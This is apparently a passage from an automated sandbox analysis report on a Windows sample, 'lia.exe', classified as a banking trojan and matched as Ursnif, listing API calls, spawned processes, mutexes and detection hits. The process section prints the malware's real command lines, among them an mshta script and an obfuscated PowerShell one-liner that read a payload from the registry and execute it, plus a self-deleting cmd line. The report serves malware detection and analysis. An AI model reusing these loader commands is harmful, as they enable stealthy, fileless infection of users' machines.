Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D8C10 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	1_2_039D8C10
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D3F97 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	1_2_039D3F97
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039E0B30 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_039E0B30
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039E7EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	1_2_039E7EEF
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D1641 memset,NtQueryInformationProcess,	1_2_039D1641
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D155B NtQuerySystemInformation,RtlNtStatusToDosError,	1_2_039D155B
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039F389B NtGetContextThread,RtlNtStatusToDosError,	1_2_039F389B
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039EE4D5 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	1_2_039EE4D5
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039D483A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	1_2_039D483A
Source: C:\Windows\System32\control.exe	Code function: 18_2_00526140 NtAllocateVirtualMemory,	18_2_00526140
Source: C:\Windows\System32\control.exe	Code function: 18_2_00539994 NtReadVirtualMemory,	18_2_00539994
Source: C:\Windows\System32\control.exe	Code function: 18_2_00521B84 NtQueryInformationProcess,	18_2_00521B84
Source: C:\Windows\System32\control.exe	Code function: 18_2_0053AC44 NtQueryInformationToken,NtQueryInformationToken,NtClose,	18_2_0053AC44
Source: C:\Windows\System32\control.exe	Code function: 18_2_00543C1C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	18_2_00543C1C
Source: C:\Windows\System32\control.exe	Code function: 18_2_0054B58C NtSetContextThread,NtUnmapViewOfSection,NtClose,	18_2_0054B58C
Source: C:\Windows\System32\control.exe	Code function: 18_2_00540E70 NtMapViewOfSection,	18_2_00540E70
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052E614 NtCreateSection,	18_2_0052E614
Source: C:\Windows\System32\control.exe	Code function: 18_2_0052FF60 RtlAllocateHeap,NtQueryInformationProcess,	18_2_0052FF60
Source: C:\Windows\System32\control.exe	Code function: 18_2_00521FBC NtWriteVirtualMemory,	18_2_00521FBC
Source: C:\Windows\System32\control.exe	Code function: 18_2_0055F003 NtProtectVirtualMemory,NtProtectVirtualMemory,	18_2_0055F003
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47E1B84 NtQueryInformationProcess,	34_2_00000215F47E1B84
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F47FAC44 NtQueryInformationToken,NtQueryInformationToken,NtClose,	34_2_00000215F47FAC44
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F481F003 NtProtectVirtualMemory,NtProtectVirtualMemory,	34_2_00000215F481F003
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036BD274 NtQueryInformationProcess,	44_2_036BD274
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D1AE3 memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	44_2_036D1AE3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D29E0 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	44_2_036D29E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036C7523 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	44_2_036C7523
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B1641 memset,NtQueryInformationProcess,	44_2_036B1641
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036C7EEF NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	44_2_036C7EEF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036B155B NtQuerySystemInformation,RtlNtStatusToDosError,	44_2_036B155B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036CE4D5 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	44_2_036CE4D5

Sample file is different than original file name gathered from version info

Source: lia.exe, 00000001.00000003.469621415.0000000004144000.00000004.00000001.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs lia.exe

Source: lia.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220112

Jump to behavior

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winEXE@34/19@9/2

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: lia.exe	Virustotal: Detection: 64%
Source: lia.exe	ReversingLabs: Detection: 74%

Source: C:\Users\user\Desktop\lia.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\lia.exe "C:\Users\user\Desktop\lia.exe"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP"
Source: C:\Users\user\Desktop\lia.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6AF4.bi1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6AF4.bi1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lia.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP"	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\lia.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6AF4.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\6AF4.bi1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: C:\Users\user\Desktop\lia.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0usnm2v.qwh.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_00B11141 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_00B11141

Source: C:\Windows\System32\control.exe

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{52A61B79-8911-546D-A3A6-CDC8873A517C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1080:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:804:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\{8A03E515-611D-4C17-3B5E-25409F722974}
Source: C:\Windows\System32\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B69CECF8-9D6C-5805-D74A-210CFB1EE500}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3312:120:WilError_01
Source: C:\Users\user\Desktop\lia.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D2B9349F-090F-D44C-2326-4D4807BAD1FC}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6A55D138-C185-2CA4-9B3E-8520FF528954}

Source: C:\Users\user\Desktop\lia.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\lia.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source:	Binary string: ntdll.pdb source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.pdb source: powershell.exe, 0000000C.00000002.614202751.000001770375D000.00000004.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B1B6BE push ebp; retf	1_2_00B1B6BF
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B1B804 push 00000055h; iretd	1_2_00B1B808
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B17BE0 push ecx; ret	1_2_00B17BE9
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B1B72E push ecx; ret	1_2_00B1B734
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_00B17F4F push ecx; ret	1_2_00B17F5F
Source: C:\Users\user\Desktop\lia.exe	Code function: 1_2_039F541F push ecx; ret	1_2_039F542F
Source: C:\Windows\System32\control.exe	Code function: 18_2_005472FD push 3B000001h; retf	18_2_00547302
Source: C:\Windows\System32\rundll32.exe	Code function: 34_2_00000215F48072FD push 3B000001h; retf	34_2_00000215F4807302
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D5070 push ecx; ret	44_2_036D5079
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D3D42 push ss; ret	44_2_036D3D43
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 44_2_036D541F push ecx; ret	44_2_036D542F

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_004012E6 LoadLibraryA,GetProcAddress,

1_2_004012E6

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline	Jump to behavior

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
Source: Yara match	File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
